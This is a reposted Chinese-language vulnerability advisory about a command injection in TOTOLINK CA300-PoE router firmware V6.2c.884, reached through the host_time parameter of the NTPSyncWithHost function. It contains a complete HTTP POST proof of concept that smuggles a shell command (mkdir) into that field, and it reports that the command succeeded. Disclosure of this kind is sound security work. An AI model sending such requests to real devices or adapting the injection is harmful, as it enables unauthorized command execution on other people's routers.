TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

admin 2023年2月5日15:59:12评论79 views字数 824阅读2分44秒阅读模式

描述

TOTOLINK路由器CA300-PoE V6.2c.884被发现存在命令注入漏洞NTPSyncWithHost。

固件信息

厂商地址:https ://www.totolink.net/固件下载地址:https ://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html受影响的版本版本:V6.2c.884

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

漏洞详情

概念验证:

POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 192.168.0.254User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 100Origin: http://192.168.0.254Connection: keep-aliveReferer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260Cookie: SESSION_ID=2:1673492439:2
{"topicurl":"NTPSyncWithHost", "host_time":"2022-01-01 20:12:43';mkdir /test9999;'"}

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

文件夹创建成功

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

原文始发于微信公众号(Ots安全):TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月5日15:59:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞http://cn-sec.com/archives/1537705.html

发表评论

匿名网友 填写信息